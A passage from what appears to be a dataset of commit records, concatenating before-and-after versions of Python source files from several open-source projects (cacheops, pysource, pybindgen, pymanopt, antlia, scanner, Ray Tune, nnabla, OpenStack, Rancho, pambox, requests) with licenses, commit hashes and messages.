from django.core.exceptions import ImproperlyConfigured
from .conf import settings
def get_prefix(**kwargs):
return settings.CACHEOPS_PREFIX(PrefixQuery(**kwargs))
class PrefixQuery(object):
def __init__(self, **kwargs):
assert set(kwargs) <= {'func', '_queryset', '_cond_dnfs', 'dbs', 'tables'}
kwargs.setdefault('func', None)
self.__dict__.update(kwargs)
@cached_property
def dbs(self):
return [self._queryset.db]
@cached_property
def db(self):
if len(self.dbs) > 1:
dbs_str = ', '.join(self.dbs)
raise ImproperlyConfigured('Single db required, but several used: ' + dbs_str)
return self.dbs[0]
@cached_property
def _cond_dnfs(self):
return self._queryset._cond_dnfs
@cached_property
def tables(self):
return list(self._cond_dnfs)
@cached_property
def table(self):
if len(self.tables) > 1:
tables_str = ', '.join(self.tables)
raise ImproperlyConfigured('Single table required, but several used: ' + tables_str)
return self.tables[0]
| bsd-3-clause | Python |
f637b84a0ec13fdae1e91030161afb0e59bcbabc | remove unused var | dankilman/pysource,dankilman/pysource | pysource/arguments.py | pysource/arguments.py | # Copyright 2014 Dan Kilman
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from argh.utils import get_arg_spec
class ArgTypeSpec(object):
    """Describes how to coerce positional string arguments for a function.

    The expected type of each positional argument is taken from the
    function's default values; arguments without a default are treated
    as plain strings.
    """

    def __init__(self, function):
        self.function_name = function.__name__
        spec = get_arg_spec(function)
        declared = spec.defaults or []
        shortfall = len(spec.args) - len(declared)
        if shortfall > 0:
            # Arguments lacking a default are coerced with str.
            declared = [str for _ in range(shortfall)] + list(declared)
        self.types = declared
        self.len_types = len(self.types)
        self.has_varargs = spec.varargs is not None

    def parse(self, args):
        """Validate the argument count and coerce each value to its type.

        Raises RuntimeError when the count does not match the spec.
        """
        given = len(args)
        if not self.has_varargs and given != self.len_types:
            raise RuntimeError(
                '{0}() takes exactly {1} arguments ({2} given)'
                .format(self.function_name, self.len_types, given))
        if self.has_varargs and given < self.len_types:
            raise RuntimeError(
                '{0}() takes at least {1} arguments ({2} given)'
                .format(self.function_name, self.len_types, given))
        converted = [coerce for coerce in ()]  # placeholder removed below
        converted = [tp(raw) for tp, raw in zip(self.types, args)]
        # Anything beyond the declared positionals passes through untouched.
        return converted + args[self.len_types:]
| # Copyright 2014 Dan Kilman
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from argh.utils import get_arg_spec
class ArgTypeSpec(object):
    """Maps a function's signature to per-argument converter callables.

    Converters come from the function's default values; args lacking a
    default are converted with ``str``.
    """
    def __init__(self, function):
        self.function_name = function.__name__
        spec = get_arg_spec(function)
        args_len = len(spec.args)
        defaults = spec.defaults or []
        if len(defaults) < args_len:
            # Defaults align with the *last* positional args, so pad the
            # front with the str fallback converter.
            prefix = [str for _ in range(args_len - len(defaults))]
            defaults = prefix + list(defaults)
        self.types = defaults
        self.len_types = len(self.types)
        self.has_varargs = spec.varargs is not None
        # NOTE(review): `keywords` is the legacy inspect.getargspec name
        # (getfullargspec calls it `varkw`) -- confirm get_arg_spec still
        # exposes it on current Pythons.
        self.has_kwargs = spec.keywords is not None
    def parse(self, args):
        """Convert ``args`` element-wise; raise RuntimeError on arity
        mismatch.  Varargs beyond the declared args pass through as-is."""
        len_args = len(args)
        if not self.has_varargs and len_args != self.len_types:
            raise RuntimeError(
                '{0}() takes exactly {1} arguments ({2} given)'
                .format(self.function_name, self.len_types, len_args))
        if self.has_varargs and len_args < self.len_types:
            raise RuntimeError(
                '{0}() takes at least {1} arguments ({2} given)'
                .format(self.function_name, self.len_types, len_args))
        parsed_args = [tpe(arg) for (tpe, arg) in zip(self.types, args)]
        varargs = args[self.len_types:]
        return parsed_args + varargs
| apache-2.0 | Python |
9275eb01ef0bcdcefb46eb936d6a85c921e92e9f | make the void return type not return an explicit Py_None, to prevent a bug hwere None is being returned as first element of tuple when there are out/inout parameters | ftalbrecht/pybindgen,gjcarneiro/pybindgen,ftalbrecht/pybindgen,cawka/pybindgen-old,gjcarneiro/pybindgen,ftalbrecht/pybindgen,gjcarneiro/pybindgen,gjcarneiro/pybindgen,ftalbrecht/pybindgen,cawka/pybindgen-old,cawka/pybindgen-old,cawka/pybindgen-old | pybindgen/typehandlers/voidtype.py | pybindgen/typehandlers/voidtype.py | # docstrings not neede here (the type handler interfaces are fully
# documented in base.py) pylint: disable-msg=C0111
from base import ReturnValue
class VoidReturn(ReturnValue):
    """Type handler for C functions returning ``void``.

    Nothing is parsed from or contributed to the Python-side return
    value; a void wrapper implicitly returns None.
    """
    CTYPES = ['void']
    def get_c_error_return(self):
        # Bare return: there is no value to propagate on error.
        return "return;"
    def convert_python_to_c(self, wrapper):
        # Empty format string: a void return consumes no parse arguments.
        wrapper.parse_params.add_parameter("", [], prepend=True)
    def convert_c_to_python(self, wrapper):
        # Deliberately contributes nothing to the build tuple, so that
        # out/inout parameters are not preceded by a spurious None.
        pass
| # docstrings not neede here (the type handler interfaces are fully
# documented in base.py) pylint: disable-msg=C0111
from base import ReturnValue
class VoidReturn(ReturnValue):
    """Type handler for C functions returning ``void``."""
    CTYPES = ['void']
    def get_c_error_return(self):
        # Bare return: there is no value to propagate on error.
        return "return;"
    def convert_python_to_c(self, wrapper):
        # Empty format string: a void return consumes no parse arguments.
        wrapper.parse_params.add_parameter("", [], prepend=True)
    def convert_c_to_python(self, wrapper):
        # NOTE(review): prepending Py_None here makes None the first
        # element of the returned tuple whenever out/inout parameters
        # exist -- presumably unintended; confirm against callers.
        wrapper.build_params.add_parameter("O", ['Py_None'], prepend=True)
| lgpl-2.1 | Python |
47c65ea8a642e7e7494cc403c00158b90ad359a5 | Delete debug message from theano_functions.py | nkoep/pymanopt,tingelst/pymanopt,pymanopt/pymanopt,nkoep/pymanopt,nkoep/pymanopt,j-towns/pymanopt,pymanopt/pymanopt | pymanopt/tools/theano_functions.py | pymanopt/tools/theano_functions.py | """
Module containing functions to compile and differentiate Theano graphs. Part of
the pymanopt package.
Jamie Townsend December 2014
"""
import theano.tensor as T
import theano
from warnings import warn
def compile(objective, argument):
    """
    Wrapper for the theano.function(). Compiles a theano graph into a python
    function.

    Note: this intentionally shadows the builtin ``compile`` within this
    module.
    """
    return theano.function([argument], objective)
def gradient(objective, argument):
    """
    Wrapper for theano.tensor.grad().
    Compute the gradient of 'objective' with respect to 'argument' and return
    compiled version.
    """
    g = T.grad(objective, argument)
    return compile(g, argument)
def grad_hess(objective, argument):
    """
    Compute both the gradient and the directional derivative of the gradient
    (which is equal to the hessian multiplied by direction).

    Returns a pair ``(grad, hess)`` of compiled Theano functions:
    ``grad(x)`` and ``hess(x, a)`` (hessian-vector product in direction a).
    """
    g = T.grad(objective, argument)
    grad = compile(g, argument)
    # Create a new tensor A, which has the same type (i.e. same dimensionality)
    # as argument.
    A = argument.type()
    try:
        # First attempt efficient 'R-op', this directly calculates the
        # directional derivative of the gradient, rather than explicitly
        # calculating the hessian and then multiplying.
        R = T.Rop(g, argument, A)
    except NotImplementedError:
        # Fallback: build the full Hessian and contract it with A.
        shp = T.shape(argument)
        H = T.jacobian(g.flatten(), argument).reshape(
            T.concatenate([shp, shp]), 2*A.ndim)
        R = T.tensordot(H, A, A.ndim)
    try:
        hess = theano.function([argument, A], R, on_unused_input='raise')
    except theano.compile.UnusedInputError:
        # A is unused when the gradient does not depend on the argument
        # (hessian identically zero/constant); warn and compile anyway.
        warn('Theano detected unused input - suggests hessian may be zero or '
             'constant.')
        hess = theano.function([argument, A], R, on_unused_input='ignore')
    return grad, hess
| """
Module containing functions to compile and differentiate Theano graphs. Part of
the pymanopt package.
Jamie Townsend December 2014
"""
import theano.tensor as T
import theano
from warnings import warn
def compile(objective, argument):
"""
Wrapper for the theano.function(). Compiles a theano graph into a python
function.
"""
return theano.function([argument], objective)
def gradient(objective, argument):
"""
Wrapper for theano.tensor.grad().
Compute the gradient of 'objective' with respect to 'argument' and return
compiled version.
"""
g = T.grad(objective, argument)
return compile(g, argument)
def grad_hess(objective, argument):
    """
    Compute both the gradient and the directional derivative of the gradient
    (which is equal to the hessian multiplied by direction).

    Returns a pair ``(grad, hess)`` of compiled Theano functions.
    """
    g = T.grad(objective, argument)
    grad = compile(g, argument)
    # Create a new tensor A, which has the same type (i.e. same dimensionality)
    # as argument.
    A = argument.type()
    try:
        # First attempt efficient 'R-op', this directly calculates the
        # directional derivative of the gradient, rather than explicitly
        # calculating the hessian and then multiplying.
        R = T.Rop(g, argument, A)
    except NotImplementedError:
        # Fallback: build the full Hessian and contract it with A.
        shp = T.shape(argument)
        H = T.jacobian(g.flatten(), argument).reshape(
            T.concatenate([shp, shp]), 2*A.ndim)
        R = T.tensordot(H, A, A.ndim)
    try:
        hess = theano.function([argument, A], R, on_unused_input='raise')
    except theano.compile.UnusedInputError:
        # Bug fix: removed leftover debug statement `print "hello"` (also
        # Python-2-only syntax) from this handler.
        warn('Theano detected unused input - suggests hessian may be zero or '
             'constant.')
        hess = theano.function([argument, A], R, on_unused_input='ignore')
    return grad, hess
| bsd-3-clause | Python |
e39fbef683e0541f8cc189aa8a612f8008a98410 | Add function to load converted lidar records | oliverlee/antlia | python/antlia/dtype.py | python/antlia/dtype.py | # -*- coding: utf-8 -*-
import gzip
import pickle
import numpy as np
LIDAR_NUM_ANGLES = 1521
LIDAR_FOV_DEG = 190
LIDAR_SAMPLE_RATE = 20
LIDAR_ANGLES = np.linspace( # in radians
(90 - LIDAR_FOV_DEG/2)*np.pi/180,
(90 + LIDAR_FOV_DEG/2)*np.pi/180,
LIDAR_NUM_ANGLES
)
"""LIDAR datatype format is:
(
timestamp (long),
flag (bool saved as int),
accelerometer[3] (double),
gps[3] (double),
distance[LIDAR_NUM_ANGLES] (long),
)
'int' and 'long' are the same size on the raspberry pi (32 bits).
"""
LIDAR_RECORD_DTYPE = np.dtype(','.join(
['i4'] + ['i4'] + 3*['f8'] + 3*['f8'] + LIDAR_NUM_ANGLES*['i4']
)
)
LIDAR_CONVERTED_DTYPE = np.dtype([
('time', 'f8'),
('sync', 'f8'),
('accelerometer x', 'f8'), # body x-axis may not be aligned with inertial!
('accelerometer y', 'f8'), # body y-axis may not be aligned with inertial!
('accelerometer z', 'f8'), # body z-axis may not be aligned with inertial!
('gps', 'f8', (3,)),
('distance', 'f8', (LIDAR_NUM_ANGLES,)),
])
def load_converted_record(filename):
    """Load a gzipped, pickled converted-lidar record from *filename*.

    Returns the unpickled array viewed as ``np.recarray`` so fields can be
    accessed as attributes (e.g. ``rec.time``).
    # assumes the pickle contains an ndarray with LIDAR_CONVERTED_DTYPE --
    # TODO confirm against the converter that writes these files.
    """
    with gzip.open(filename, 'rb') as f:
        return pickle.load(f).view(np.recarray)
| # -*- coding: utf-8 -*-
import numpy as np
LIDAR_NUM_ANGLES = 1521
LIDAR_FOV_DEG = 190
LIDAR_SAMPLE_RATE = 20
LIDAR_ANGLES = np.linspace( # in radians
(90 - LIDAR_FOV_DEG/2)*np.pi/180,
(90 + LIDAR_FOV_DEG/2)*np.pi/180,
LIDAR_NUM_ANGLES
)
"""LIDAR datatype format is:
(
timestamp (long),
flag (bool saved as int),
accelerometer[3] (double),
gps[3] (double),
distance[LIDAR_NUM_ANGLES] (long),
)
'int' and 'long' are the same size on the raspberry pi (32 bits).
"""
LIDAR_RECORD_DTYPE = np.dtype(','.join(
['i4'] + ['i4'] + 3*['f8'] + 3*['f8'] + LIDAR_NUM_ANGLES*['i4']
)
)
LIDAR_CONVERTED_DTYPE = np.dtype([
('time', 'f8'),
('sync', 'f8'),
('accelerometer x', 'f8'), # body x-axis may not be aligned with inertial!
('accelerometer y', 'f8'), # body y-axis may not be aligned with inertial!
('accelerometer z', 'f8'), # body z-axis may not be aligned with inertial!
('gps', 'f8', (3,)),
('distance', 'f8', (LIDAR_NUM_ANGLES,)),
])
| bsd-2-clause | Python |
5f501af61b416dae0e46236a8e1f9684dcc66e21 | Write out concatenated frame on decode test failure | scanner-research/scanner,scanner-research/scanner,scanner-research/scanner,scanner-research/scanner | python/decoder_test.py | python/decoder_test.py | import argparse
import scanner
import numpy as np
import cv2
from decode import db
@db.loader('frame')
def load_frames(buf, metadata):
    """Decode a raw frame buffer into an (height, width, 3) uint8 array.

    Registered with the scanner database as the loader for the 'frame'
    column; `buf` holds raw RGB bytes and `metadata` carries dimensions.
    """
    return np.frombuffer(buf, dtype=np.uint8) \
        .reshape((metadata.height,metadata.width,3))
def extract_frames(args):
    """Compare scanner-decoded frames against OpenCV-decoded frames.

    For every mismatching frame, prints a message and writes a JPEG with
    the scanner frame, the OpenCV frame, and their absolute difference
    side by side.
    """
    job = load_frames(args['dataset'], 'edr')
    video_paths = job._dataset.video_data.original_video_paths
    for (vid, frames) in job.as_frame_list():
        video_path = video_paths[int(vid)]
        inp = cv2.VideoCapture(video_path)
        assert(inp.isOpened())
        video_frame_num = -1
        for (frame_num, buf) in frames:
            # Advance the OpenCV stream to the frame scanner decoded.
            while video_frame_num != frame_num:
                _, video_frame = inp.read()
                video_frame_num += 1
            scanner_frame = cv2.cvtColor(buf, cv2.COLOR_RGB2BGR)
            # Bug fix: subtracting uint8 arrays wraps modulo 256, so
            # np.abs on the raw difference was meaningless. Compute the
            # difference in a signed dtype, then clamp back for imwrite.
            frame_diff = np.abs(scanner_frame.astype(np.int16) -
                                video_frame.astype(np.int16)).astype(np.uint8)
            if frame_diff.sum() != 0:
                print('Frame {} does not match!'.format(frame_num))
                cv2.imwrite('decode_frames_' + str(frame_num) + '.jpg',
                            np.concatenate(
                                (scanner_frame, video_frame, frame_diff), 1))
        # Release the capture handle (was leaked previously).
        inp.release()
if __name__ == "__main__":
p = argparse.ArgumentParser(description='Extract JPEG frames from videos')
p.add_argument('dataset', type=str)
extract_frames(p.parse_args().__dict__)
| import argparse
import scanner
import numpy as np
import cv2
from decode import db
@db.loader('frame')
def load_frames(buf, metadata):
return np.frombuffer(buf, dtype=np.uint8) \
.reshape((metadata.height,metadata.width,3))
def extract_frames(args):
job = load_frames(args['dataset'], 'edr')
video_paths = job._dataset.video_data.original_video_paths
for (vid, frames) in job.as_frame_list():
video_path = video_paths[int(vid)]
inp = cv2.VideoCapture(video_path)
assert(inp.isOpened())
video_frame_num = -1
for (frame_num, buf) in frames:
while video_frame_num != frame_num:
_, video_frame = inp.read()
video_frame_num += 1
scanner_frame = cv2.cvtColor(buf, cv2.COLOR_RGB2BGR)
frame_diff = (scanner_frame - video_frame).sum()
if frame_diff != 0:
print('Frame {} does not match!'.format(frame_num))
if __name__ == "__main__":
p = argparse.ArgumentParser(description='Extract JPEG frames from videos')
p.add_argument('dataset', type=str)
extract_frames(p.parse_args().__dict__)
| apache-2.0 | Python |
21140c20c62fb90806f77f0820a046e364567a6d | fix tune stopper attribute name (#28517) | ray-project/ray,ray-project/ray,ray-project/ray,ray-project/ray,ray-project/ray,ray-project/ray,ray-project/ray,ray-project/ray | python/ray/tune/stopper/stopper.py | python/ray/tune/stopper/stopper.py | import abc
from ray.util.annotations import PublicAPI
@PublicAPI
class Stopper(abc.ABC):
    """Base class for implementing a Tune experiment stopper.

    Allows users to implement experiment-level stopping via ``stop_all``. By
    default, this class does not stop any trials. Subclasses need to
    implement ``__call__`` and ``stop_all``.

    .. code-block:: python

        import time
        from ray import air, tune
        from ray.tune import Stopper

        class TimeStopper(Stopper):
            def __init__(self):
                self._start = time.time()
                self._deadline = 300

            def __call__(self, trial_id, result):
                return False

            def stop_all(self):
                return time.time() - self._start > self._deadline

        tuner = tune.Tuner(
            Trainable,
            tune_config=tune.TuneConfig(num_samples=200),
            run_config=air.RunConfig(stop=TimeStopper())
        )
        tuner.fit()
    """

    def __call__(self, trial_id, result):
        """Returns true if the trial should be terminated given the result."""
        raise NotImplementedError

    def stop_all(self):
        """Returns true if the experiment should be terminated."""
        raise NotImplementedError
@PublicAPI
class CombinedStopper(Stopper):
    """Combine several stoppers via 'OR'.

    A trial (or the experiment) stops as soon as any wrapped stopper
    says so.

    Args:
        *stoppers: Stoppers to be combined.

    Example:

    .. code-block:: python

        from ray.tune.stopper import CombinedStopper, \
            MaximumIterationStopper, TrialPlateauStopper

        stopper = CombinedStopper(
            MaximumIterationStopper(max_iter=20),
            TrialPlateauStopper(metric="my_metric")
        )

        tuner = Tuner(
            Trainable,
            run_config=air.RunConfig(stop=stopper)
        )
        tuner.fit()

    """

    def __init__(self, *stoppers: Stopper):
        self._stoppers = stoppers

    def __call__(self, trial_id, result):
        # Short-circuit on the first stopper that fires.
        for stopper in self._stoppers:
            if stopper(trial_id, result):
                return True
        return False

    def stop_all(self):
        for stopper in self._stoppers:
            if stopper.stop_all():
                return True
        return False
| import abc
from ray.util.annotations import PublicAPI
@PublicAPI
class Stopper(abc.ABC):
    """Base class for implementing a Tune experiment stopper.

    Allows users to implement experiment-level stopping via ``stop_all``. By
    default, this class does not stop any trials. Subclasses need to
    implement ``__call__`` and ``stop_all``.

    .. code-block:: python

        import time
        from ray import air, tune
        from ray.tune import Stopper

        class TimeStopper(Stopper):
            def __init__(self):
                self._start = time.time()
                self._deadline = 300

            def __call__(self, trial_id, result):
                return False

            def stop_all(self):
                return time.time() - self._start > self._deadline

        tuner = tune.Tuner(
            Trainable,
            tune_config=tune.TuneConfig(num_samples=200),
            run_config=air.RunConfig(stop=TimeStopper())
        )
        tuner.fit()
    """

    def __call__(self, trial_id, result):
        """Returns true if the trial should be terminated given the result."""
        raise NotImplementedError

    def stop_all(self):
        """Returns true if the experiment should be terminated."""
        raise NotImplementedError
@PublicAPI
class CombinedStopper(Stopper):
"""Combine several stoppers via 'OR'.
Args:
*stoppers: Stoppers to be combined.
Example:
.. code-block:: python
from ray.tune.stopper import CombinedStopper, \
MaximumIterationStopper, TrialPlateauStopper
stopper = CombinedStopper(
MaximumIterationStopper(max_iter=20),
TrialPlateauStopper(metric="my_metric")
)
tuner = Tuner(
Trainable,
run_config=air.RunConfig(stop=stopper)
)
tuner.fit()
"""
def __init__(self, *stoppers: Stopper):
self._stoppers = stoppers
def __call__(self, trial_id, result):
return any(s(trial_id, result) for s in self._stoppers)
def stop_all(self):
return any(s.stop_all() for s in self._stoppers)
| apache-2.0 | Python |
eb3aed68e470e44c26bcf4d2973f204be8bff6cd | Delete unnecessary comma. | sony/nnabla,sony/nnabla,sony/nnabla | python/test/function/test_round.py | python/test/function/test_round.py | # Copyright (c) 2017 Sony Corporation. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import numpy as np
import nnabla as nn
import nnabla.functions as F
from nbla_test_utils import list_context
ctxs = list_context('Round')
def ref_round(x):
    """Reference forward pass: element-wise round via NumPy.

    np.around is the documented alias of np.round (rounds half to even).
    """
    return np.around(x)
def ref_grad_round(x, dy):
    """Reference backward pass: rounding is treated as identity, so the
    incoming gradient is returned unchanged as a flat copy."""
    return dy.copy().reshape(-1)
@pytest.mark.parametrize("ctx, func_name", ctxs)
@pytest.mark.parametrize("seed", [313])
def test_fixed_point_quantize_forward_backward(seed,
                                               ctx, func_name):
    # Forward/backward check of F.round against the NumPy reference.
    # NOTE(review): the name says "fixed_point_quantize" but this file
    # exercises F.round -- likely copied from the quantize test; consider
    # renaming.
    from nbla_test_utils import cap_ignore_region, \
        function_tester
    rng = np.random.RandomState(seed)
    # Values in (-1e-3, 1e-3) are excluded from the inputs -- presumably
    # to keep the finite-difference gradient check stable; confirm.
    inputs = [
        cap_ignore_region(
            rng.randn(2, 3, 4).astype(np.float32) * 2,
            (-1e-3, 1e-3))]
    function_tester(rng,F.round,
                    ref_round,
                    inputs,
                    atol_b=1e-3, backward=[True],
                    ctx=ctx, func_name=func_name,
                    ref_grad=ref_grad_round)
| # Copyright (c) 2017 Sony Corporation. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import numpy as np
import nnabla as nn
import nnabla.functions as F
from nbla_test_utils import list_context
ctxs = list_context('Round')
def ref_round(x):
    """Reference forward pass: element-wise round via NumPy.

    Bug fix: removed a stray trailing comma in the signature
    (``def ref_round(x, ):``).
    """
    return np.round(x)
def ref_grad_round(x, dy):
return dy.flatten()
@pytest.mark.parametrize("ctx, func_name", ctxs)
@pytest.mark.parametrize("seed", [313])
def test_fixed_point_quantize_forward_backward(seed,
ctx, func_name):
from nbla_test_utils import cap_ignore_region, \
function_tester
rng = np.random.RandomState(seed)
inputs = [
cap_ignore_region(
rng.randn(2, 3, 4).astype(np.float32) * 2,
(-1e-3, 1e-3))]
function_tester(rng,F.round,
ref_round,
inputs,
atol_b=1e-3, backward=[True],
ctx=ctx, func_name=func_name,
ref_grad=ref_grad_round)
| apache-2.0 | Python |
ddecbb79f995cfac469d121d71cbdc6941f6cfef | delete for user api | ironcamel/openstack.api,ntt-pf-lab/backup_openstackx | openstack/extras/users.py | openstack/extras/users.py | from openstack.api import base
class User(base.Resource):
    """A Keystone user resource; mutating helpers delegate to the manager."""
    def __repr__(self):
        return "<User %s>" % self._info
    def delete(self):
        # Delegate deletion of this user to the owning manager.
        self.manager.delete(self)
    def update(self, description=None, enabled=None):
        # Fall back to the current description, then '(none)' so the API
        # always receives a non-empty value.
        description = description or self.description or '(none)'
        # NOTE(review): UserManager (below) defines no update(); this
        # presumably relies on a base-class method -- confirm.
        self.manager.update(self.id, description, enabled)
class UserManager(base.ManagerWithFind):
    """CRUD operations for users against the identity API."""
    resource_class = User
    def get(self, user_id):
        """Fetch a single user by id."""
        return self._get("/users/%s" % user_id, "user")
    def create(self, user_id, email, password, tenant_id, enabled=True):
        """Create a user with the given id, email, password and tenant."""
        params = {"user": {"id": user_id,
                           "email": email,
                           "tenantId": tenant_id,
                           "enabled": enabled,
                           "password": password}}
        return self._create('/users', params, "user")
    def _create(self, url, body, response_key):
        # NOTE(review): overrides the base _create to issue a PUT rather
        # than POST -- presumably required by this API; confirm.
        resp, body = self.api.connection.put(url, body=body)
        return self.resource_class(self, body[response_key])
    def delete(self, user_id):
        """Delete the user with the given id."""
        self._delete("/users/%s" % user_id)
    def list(self):
        """
        Get a list of users.

        :rtype: list of :class:`User`
        """
        return self._list("/users", "users")
| from openstack.api import base
class User(base.Resource):
def __repr__(self):
return "<User %s>" % self._info
def delete(self):
self.manager.delete(self)
def update(self, description=None, enabled=None):
description = description or self.description or '(none)'
self.manager.update(self.id, description, enabled)
class UserManager(base.ManagerWithFind):
resource_class = User
def get(self, user_id):
return self._get("/users/%s" % user_id, "user")
def create(self, user_id, email, password, tenant_id, enabled=True):
params = {"user": {"id": user_id,
"email": email,
"tenantId": tenant_id,
"enabled": enabled,
"password": password}}
return self._create('/users', params, "user")
def _create(self, url, body, response_key):
resp, body = self.api.connection.put(url, body=body)
return self.resource_class(self, body[response_key])
def list(self):
"""
Get a list of users.
:rtype: list of :class:`User`
"""
return self._list("/users", "users")
| bsd-3-clause | Python |
c35021091ee308c1be999b2a2a479dd83753cf98 | correct urls include statement | joaquimrocha/Rancho,joaquimrocha/Rancho,joaquimrocha/Rancho | rancho/project/urls.py | rancho/project/urls.py | ########################################################################
# Rancho - Open Source Group/Project Management Tool
# Copyright (C) 2008 The Rancho Team
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
########################################################################
from django.conf.urls.defaults import *
urlpatterns = patterns('rancho.project.views',
(r'^new/$', 'new_project'),
(r'^(?P<p_id>\d+)/$', 'overview'),
(r'^(?P<p_id>\d+)/overview/$', 'overview'),
(r'^(?P<p_id>\d+)/settings/$', 'settings'),
(r'^(?P<p_id>\d+)/delete_logo/$', 'delete_logo'),
(r'^(?P<p_id>\d+)/message/', include('rancho.message.urls')),
(r'^(?P<p_id>\d+)/chat/', include('rancho.chat.urls')),
(r'^(?P<p_id>\d+)/wikiboards/', include('rancho.wikiboard.urls')),
(r'^(?P<p_id>\d+)/todos/', include('rancho.todo.urls')),
(r'^(?P<p_id>\d+)/people/(?P<user_id>\d+)/permissions$', 'edit_permissions'),
(r'^(?P<p_id>\d+)/people/$', 'show_people_project'),
(r'^(?P<p_id>\d+)/people/add/', 'add_people_to_project'),
(r'^(?P<p_id>\d+)/people/remove/', 'remove_user'),
(r'^(?P<p_id>\d+)/milestones/', include('rancho.milestone.urls')),
(r'^(?P<p_id>\d+)/files/', include('rancho.file.urls')),
(r'^(?P<p_id>\d+)/delete/', 'delete_project'),
)
| ########################################################################
# Rancho - Open Source Group/Project Management Tool
# Copyright (C) 2008 The Rancho Team
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
########################################################################
from django.conf.urls.defaults import *
urlpatterns = patterns('rancho.project.views',
(r'^new/$', 'new_project'),
(r'^(?P<p_id>\d+)/$', 'overview'),
(r'^(?P<p_id>\d+)/overview/$', 'overview'),
(r'^(?P<p_id>\d+)/settings/$', 'settings'),
(r'^(?P<p_id>\d+)/delete_logo/$', 'delete_logo'),
(r'^(?P<p_id>\d+)/message/', include('message.urls')),
(r'^(?P<p_id>\d+)/chat/', include('chat.urls')),
(r'^(?P<p_id>\d+)/wikiboards/', include('wikiboard.urls')),
(r'^(?P<p_id>\d+)/todos/', include('todo.urls')),
(r'^(?P<p_id>\d+)/people/(?P<user_id>\d+)/permissions$', 'edit_permissions'),
(r'^(?P<p_id>\d+)/people/$', 'show_people_project'),
(r'^(?P<p_id>\d+)/people/add/', 'add_people_to_project'),
(r'^(?P<p_id>\d+)/people/remove/', 'remove_user'),
(r'^(?P<p_id>\d+)/milestones/', include('milestone.urls')),
(r'^(?P<p_id>\d+)/files/', include('file.urls')),
(r'^(?P<p_id>\d+)/delete/', 'delete_project'),
)
| agpl-3.0 | Python |
46da58250234b1d7351fbb318d318a5a7f5552f2 | Remove binaural models from __init__ file | achabotl/pambox | pambox/speech/__init__.py | pambox/speech/__init__.py | """
The :mod:`pambox.speech` module gather speech intelligibility
models, a framework to run intelligibility experiments, as well as a wrapper
around speech materials.
"""
from __future__ import absolute_import
from .sepsm import Sepsm
from .mrsepsm import MrSepsm
from .sii import Sii
from .stec import Stec
from .material import Material
from .experiment import Experiment
__all__ = [
'Sepsm',
'MrSepsm',
'Sii',
'Stec',
'Material',
'Experiment'
]
| """
The :mod:`pambox.speech` module gather speech intelligibility
models, a framework to run intelligibility experiments, as well as a wrapper
around speech materials.
"""
from __future__ import absolute_import
from .binauralsepsm import BinauralSepsm
from .binauralmrsepsm import BinauralMrSepsm
from .sepsm import Sepsm
from .mrsepsm import MrSepsm
from .sii import Sii
from .stec import Stec
from .material import Material
from .experiment import Experiment
__all__ = [
'BinauralSepsm',
'BinauralMrSepsm',
'Sepsm',
'MrSepsm',
'Sii',
'Stec',
'Material',
'Experiment'
]
| bsd-3-clause | Python |
64ba451049c614eb14d336c2e7989ffaa81b2bb5 | make StreamConsumedError doubly inherit | psf/requests | requests/exceptions.py | requests/exceptions.py | # -*- coding: utf-8 -*-
"""
requests.exceptions
~~~~~~~~~~~~~~~~~~~
This module contains the set of Requests' exceptions.
"""
from .packages.urllib3.exceptions import HTTPError as BaseHTTPError
class RequestException(IOError):
    """There was an ambiguous exception that occurred while handling your
    request."""

    def __init__(self, *args, **kwargs):
        """
        Initialize RequestException with `request` and `response` objects.
        """
        self.response = kwargs.pop('response', None)
        self.request = kwargs.pop('request', None)
        # When no request was supplied, borrow the one attached to the
        # response (if any).
        if self.response is not None and not self.request:
            self.request = getattr(self.response, 'request', self.request)
        super(RequestException, self).__init__(*args, **kwargs)
class HTTPError(RequestException):
    """An HTTP error occurred."""


# NOTE: this name shadows Python 3's builtin ConnectionError when
# star-imported from this module.
class ConnectionError(RequestException):
    """A Connection error occurred."""


class ProxyError(ConnectionError):
    """A proxy error occurred."""


class SSLError(ConnectionError):
    """An SSL error occurred."""


class Timeout(RequestException):
    """The request timed out.

